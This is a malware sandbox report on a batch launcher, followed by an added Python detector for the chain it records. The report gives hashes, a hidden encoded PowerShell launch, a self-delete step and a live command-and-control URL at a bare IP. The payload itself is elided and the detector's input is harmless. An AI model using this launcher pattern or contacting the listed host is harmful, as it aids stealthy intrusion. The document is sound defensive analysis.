File name: | 3_launcher.bat |
Full analysis: | https://app.any.run/tasks/5ccf49e9-60a9-45eb-8488-3bf620f5d4b2 |
Verdict: | Malicious activity |
Analysis date: | May 14, 2019, 21:05:09 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | text/x-msdos-batch |
File info: | DOS batch file, ASCII text, with very long lines |
MD5: | 7F88D30970C9B5A35DD42AA8C127AF64 |
SHA1: | 770A8F4ECD2BAC296AEF15DDB12A4A53E69BCEF3 |
SHA256: | 41FBF421A1E7322AB78A98E9E75747A96AAEBBB5A2D716FEB9615AE3E871ADEB |
SSDEEP: | 96:CsQZ+ZB4InnAAdbYV0X3SwtGegY0foZY504sxsJAA+Gi+vYz3mFh:Ct05Y2XttVOYY53sUi4m3mL |
PID | CMD | Path | Indicators | Parent process
---|---|---|---|---
3364 | cmd /c ""C:\Users\admin\AppData\Local\Temp\3_launcher.bat" " | C:\Windows\system32\cmd.exe | — | explorer.exe
2368 | powershell -noP -sta -w 1 -enc … | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | | cmd.exe
1480 | cmd /c del "C:\Users\admin\AppData\Local\Temp\3_launcher.bat" | C:\Windows\system32\cmd.exe | — | cmd.exe

PID | User | Company | Integrity Level | Description | Exit code | Version
---|---|---|---|---|---|---
3364 | admin | Microsoft Corporation | MEDIUM | Windows Command Processor | 0 | 6.1.7601.17514 (win7sp1_rtm.101119-1850)
2368 | admin | Microsoft Corporation | MEDIUM | Windows PowerShell | — | 6.1.7600.16385 (win7_rtm.090713-1255)
1480 | admin | Microsoft Corporation | MEDIUM | Windows Command Processor | 0 | 6.1.7601.17514 (win7sp1_rtm.101119-1850)
PID | Process | Filename | Type | MD5 | SHA256
---|---|---|---|---|---
2368 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZSCQ1951GVDXPQY1BX2Y.temp | — | — | —
2368 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | 33B4C42BAF9E3CA295E3BDCD51C02EAF | B4273C31A01B0B90869574075D54D52E8098519587F61AE756B69729D0AF86A5
2368 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF133e16.TMP | binary | 33B4C42BAF9E3CA295E3BDCD51C02EAF | B4273C31A01B0B90869574075D54D52E8098519587F61AE756B69729D0AF86A5
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
---|---|---|---|---|---|---|---|---|---
2368 | powershell.exe | GET | — | 34.238.235.73:80 | http://34.238.235.73/news.php | US | — | — | malicious

PID | Process | IP | Domain | ASN | CN | Reputation
---|---|---|---|---|---|---
2368 | powershell.exe | 34.238.235.73:80 | — | Amazon.com, Inc. | US | malicious
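The process tree in this report is the common batch-launcher chain: cmd.exe runs a .bat from the user's Temp directory, the batch starts powershell.exe with `-noP -sta -w 1 -enc` (powershell.exe accepts any unambiguous prefix of a parameter name, so these resolve to -NoProfile, -Sta, -WindowStyle Hidden and -EncodedCommand, whose value is base64 of a UTF-16LE script), the PowerShell process fetches http://34.238.235.73/news.php from a bare IP, and a second cmd.exe deletes the launcher. The CustomDestinations files in the file table are Windows jump-list entries that the console host updates on launch, not dropped payloads. The following Python is an added example, not part of the ANY.RUN report: it resolves the abbreviated switches, decodes the -enc argument, and flags each step of the chain over rows constructed to mirror the report. The report's own encoded payload is not reproduced here; a harmless constructed command is encoded in its place, and the names `parse_powershell`, `resolve_param` and `analyze` are this example's, not the sandbox's.

```python
"""Detect the 'Temp .bat -> hidden encoded PowerShell -> self-delete' chain
from sandbox-style process and HTTP rows (added example, constructed input)."""
import base64
import ipaddress
import re
from urllib.parse import urlparse

# Full powershell.exe parameter names. powershell.exe resolves any unambiguous
# prefix (-noP -> -NoProfile, -w -> -WindowStyle); -e and -ec are the
# documented shortcuts for -EncodedCommand.
PS_PARAMS = ["NoProfile", "NonInteractive", "NoLogo", "NoExit", "Sta", "Mta",
             "WindowStyle", "EncodedCommand", "ExecutionPolicy", "Command",
             "File", "Version", "InputFormat", "OutputFormat", "PSConsoleFile"]
PARAMS_WITH_VALUE = {"WindowStyle", "EncodedCommand", "ExecutionPolicy", "Command",
                     "File", "Version", "InputFormat", "OutputFormat", "PSConsoleFile"}
# Numeric -WindowStyle values: 0 Normal, 1 Hidden, 2 Minimized, 3 Maximized.
WINDOW_STYLES = {"0": "Normal", "1": "Hidden", "2": "Minimized", "3": "Maximized"}
# A .bat under <user>\AppData\Local\Temp, as in the report's launcher path.
TEMP_BAT = re.compile(r'[A-Za-z]:\\Users\\[^\\"]+\\AppData\\Local\\Temp\\[^"\s]+\.bat', re.I)


def resolve_param(token):
    """Map an abbreviated switch such as '-noP' to its full name, or None if ambiguous."""
    name = token.lstrip("-/").lower()
    if name in ("e", "ec"):
        return "EncodedCommand"
    hits = [p for p in PS_PARAMS if p.lower().startswith(name)]
    return hits[0] if len(hits) == 1 else None


def parse_powershell(cmdline):
    """Return {parameter: value} for a powershell.exe command line, decoding -enc."""
    tokens = cmdline.split()[1:]          # drop the image name
    params, i = {}, 0
    while i < len(tokens):
        full = resolve_param(tokens[i]) if tokens[i][:1] in "-/" else None
        if full is None:
            i += 1
            continue
        if full in PARAMS_WITH_VALUE and i + 1 < len(tokens):
            params[full] = tokens[i + 1]
            i += 2
        else:
            params[full] = True
            i += 1
    if "WindowStyle" in params:
        v = params["WindowStyle"]
        params["WindowStyle"] = WINDOW_STYLES.get(v, v.capitalize())
    if "EncodedCommand" in params:
        # -EncodedCommand is base64 over the UTF-16LE bytes of the script.
        params["DecodedCommand"] = base64.b64decode(params["EncodedCommand"]).decode("utf-16-le")
    return params


def analyze(processes, http_requests):
    """Return (indicator, detail) tuples; each process row has pid, image, parent_image, cmdline."""
    findings = []
    for p in processes:
        img = p["image"].lower()
        if img == "cmd.exe":
            m = TEMP_BAT.search(p["cmdline"])
            if m and re.search(r"\bdel\b", p["cmdline"], re.I):
                findings.append(("self_delete", f"pid {p['pid']} deletes {m.group(0)}"))
            elif m:
                findings.append(("temp_bat_launcher", f"pid {p['pid']} runs {m.group(0)}"))
        elif img == "powershell.exe":
            ps = parse_powershell(p["cmdline"])
            if ps.get("WindowStyle") == "Hidden":
                findings.append(("hidden_window", f"pid {p['pid']}"))
            if "EncodedCommand" in ps:
                findings.append(("encoded_command", f"pid {p['pid']}: {ps['DecodedCommand']!r}"))
            if p["parent_image"].lower() == "cmd.exe":
                findings.append(("cmd_spawns_powershell", f"pid {p['pid']}"))
    for r in http_requests:
        host = urlparse(r["url"]).hostname or ""
        try:
            ipaddress.ip_address(host)   # raises ValueError for a DNS name
            findings.append(("http_to_bare_ip", f"pid {r['pid']} {r['method']} {r['url']}"))
        except ValueError:
            pass
    return findings


# Constructed rows mirroring the report's process tree. The real -enc payload is
# not reproduced; a harmless stand-in command is encoded the way powershell.exe expects.
STANDIN = base64.b64encode("Write-Host 'stand-in'".encode("utf-16-le")).decode()
BAT = r"C:\Users\admin\AppData\Local\Temp\3_launcher.bat"
SAMPLE_PROCESSES = [
    {"pid": 3364, "image": "cmd.exe", "parent_image": "explorer.exe",
     "cmdline": f'cmd /c ""{BAT}" "'},
    {"pid": 2368, "image": "powershell.exe", "parent_image": "cmd.exe",
     "cmdline": f"powershell -noP -sta -w 1 -enc {STANDIN}"},
    {"pid": 1480, "image": "cmd.exe", "parent_image": "cmd.exe",
     "cmdline": f'cmd /c del "{BAT}"'},
]
SAMPLE_HTTP = [{"pid": 2368, "method": "GET", "url": "http://34.238.235.73/news.php"}]

if __name__ == "__main__":
    for kind, detail in analyze(SAMPLE_PROCESSES, SAMPLE_HTTP):
        print(f"{kind:22} {detail}")
```

On a real host the same rows come from Sysmon Event ID 1 (process creation, with ParentImage) and Event ID 3 or proxy logs for the connection; the prefix resolution matters because `-w 1 -enc` never contains the strings "WindowStyle Hidden" or "EncodedCommand" that a naive substring rule would look for.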